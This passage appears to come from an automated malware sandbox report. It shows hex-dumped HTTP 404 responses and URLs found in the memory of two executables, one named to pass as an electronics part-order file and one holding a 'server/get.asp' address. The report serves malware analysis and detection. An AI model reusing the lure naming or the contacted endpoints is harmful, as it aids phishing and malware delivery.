3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:13 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 08:25:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:33 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 16 Jan 2025 08:25:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31

Source: cvSKtqilyhlQ.exe, 00000006.00000002.3524646475.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://server/get.asp
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe, 00000000.00000002.1855013710.0000000009392000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cvSKtqilyhlQ.exe, 00000008.00000002.3525202420.0000000002C2A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rpa.asia
